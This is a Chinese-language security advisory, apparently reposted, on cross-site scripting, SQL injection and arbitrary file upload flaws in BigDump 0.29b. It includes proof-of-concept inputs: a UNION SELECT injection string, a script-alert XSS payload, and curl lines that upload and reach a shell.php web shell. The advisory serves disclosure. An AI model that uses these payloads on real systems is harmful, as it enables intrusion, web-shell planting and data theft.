BigDump 跨站脚本、SQL注入、任意文件上传漏洞

发布日期:2012-11-28
更新日期:2012-12-04

受影响系统:
ozerov BigDump 0.29b
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56744

BigDump 是由德国人Alexey Ozerov 用PHP语言开发的一个工具脚本,用来导入批量mysql数据。

BigDump 0.29b、0.32b及其他版本在实现上存在跨站脚本、SQL注入、任意文件上传漏洞,利用这些漏洞攻击者可窃取Cookie身份验证凭证、上传任意文件、访问或修改数据、利用下层数据库内的其他漏洞。

<*来源:Ur0b0r0x
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

?start= [SQL]

?start= [XSS]

[File Upload]

# Expl0it/P0c ###################
?start=  < Sql Vulnerability Path >
?start=  < Xss Vulnerability Path >
        < Arbitrary Upload  Path >

# Expl0it/P0c/upload ###############
Input $ch = curl_init("http://site.com/bigdump.php?start=shell.php")
Output $ch = curl_init("http://site.com/bigdump/uploads/shell.php")

# Expl0it/P0c/Sql ###################
+union+select+1,2,3,4,5,6,7,8,9,10--+

# Expl0it/P0c/Xss ###################
"><script>alert(String.fromCharCode(88,83,83))</script>

# Vulnerability/C0de/###################
<form method="POST" action="<?php echo ($_SERVER["PHP_SELF"]); ?>?action=step3" enctype="multipart/form-data">
<input type="hidden" value="$upload_max_filesize">
<p>Dump file: <input type="file" accept="*/*" size=60"></p>
<p><input type="submit" value="Upload"></p></form>

# Samples/Arbitrart_Upload/Sql/Xss ####################




?start=%
?start=%
?start=%
?start=%

建议:
--------------------------------------------------------------------------------
厂商补丁:

ozerov
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyddjy.html